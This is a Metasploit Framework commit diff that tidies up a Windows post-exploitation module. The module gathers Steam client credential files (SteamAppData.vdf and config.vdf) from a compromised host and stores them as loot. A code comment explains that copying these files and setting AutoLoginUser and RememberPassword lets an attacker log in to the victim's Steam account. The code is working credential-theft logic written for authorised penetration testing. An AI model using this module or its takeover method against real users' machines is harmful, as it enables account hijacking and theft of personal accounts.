last cleanup for steam.rb

jvazquez-r7 · jvazquez-r7 · commit 3e81fb200209 · 2012-12-12T11:48:46.000+01:00
diff --git a/modules/post/windows/gather/credentials/steam.rb b/modules/post/windows/gather/credentials/steam.rb
@@ -1,27 +1,10 @@
-##
-# $Id: steam.rb
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # web site for more information on licensing and terms of use.
 #   http://metasploit.com/
 ##
 
-##
-# All that is needed to login to another Steam account is config.vdf,
-# setting the AutoLoginUser to the proper username and RememberPassword
-# to 1 in SteamAppData.vdf.
-# Only tested on Win7 x64
-#
-# config.vdf , ContentCache element holds a K,V table of what appears
-# to be UniqueID, Session. This is purely speculation as I have not
-# reversed it to check. However the key is always unique to the account
-# and the value changes whenever the account is logged out and then
-# back in.
-##
-
 require 'msf/core'
 require 'msf/core/post/file'
 
@@ -42,6 +25,16 @@ def initialize(info={})
 		))
 	end
 
+	# All that is needed to login to another Steam account is config.vdf,
+	# setting the AutoLoginUser to the proper username and RememberPassword
+	# to 1 in SteamAppData.vdf.
+	# Only tested on Win7 x64
+	#
+	# config.vdf , ContentCache element holds a K,V table of what appears
+	# to be UniqueID, Session. This is purely speculation as I have not
+	# reversed it to check. However the key is always unique to the account
+	# and the value changes whenever the account is logged out and then
+	# back in.
 	def run
 		steamappdata = 'SteamAppData.vdf'
 		steamconfig = 'config.vdf'
@@ -50,25 +43,26 @@ def run
 		# Steam client is only 32 bit so we need to know what arch we are on so that we can use
 		# the correct program files folder.
 		# We will just use an x64 only defined env variable to check.
-		if not expand_path('%ProgramFiles(X86)%').empty?
+		if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/
 			progs = expand_path('%ProgramFiles(X86)%') #x64
 		else
 			progs = expand_path('%ProgramFiles%') #x86
 		end
-		path = progs + '\\Steam\\config\\'
+		path = progs + '\\Steam\\config'
 
 		print_status("Checking for Steam configs in #{path}")
 
 		# Check if all the files are there.
-		# I know the path[0..-2] is ugly but directory? does not permit trailing slashes.
-		if directory?(path[0..-2]) && file?(path+steamappdata) && file?(path+steamconfig)
+		if directory?(path) && file?("#{path}\\#{steamappdata}") && file?("#{path}\\#{steamconfig}")
 			print_status("Located steam config files.")
-			sad = read_file(path+steamappdata)
+			sad = read_file("#{path}\\#{steamappdata}")
 			if sad =~ /RememberPassword\W*\"1\"/
 				print_status("RememberPassword is set! Accountname is #{u_rx.match(sad)[1]}")
-				scd = read_file(path+steamconfig)
-				store_loot('steam.config', 'text/plain', session, sad, filename=steamappdata)
-				store_loot('steam.config', 'text/plain', session, scd, filename=steamconfig)
+				scd = read_file("#{path}\\#{steamconfig}")
+				steam_app_data_path = store_loot('steam.config', 'text/plain', session, sad, filename=steamappdata)
+				print_good("The file SteamAppData.vdf has been stored on #{steam_app_data_path}")
+				steam_config_path = store_loot('steam.config', 'text/plain', session, scd, filename=steamconfig)
+				print_good("The file config.vdf has been stored on #{steam_config_path}")
 				print_status("Steam configs harvested successfully!")
 			else
 				print_error("RememberPassword is not set, exiting.")
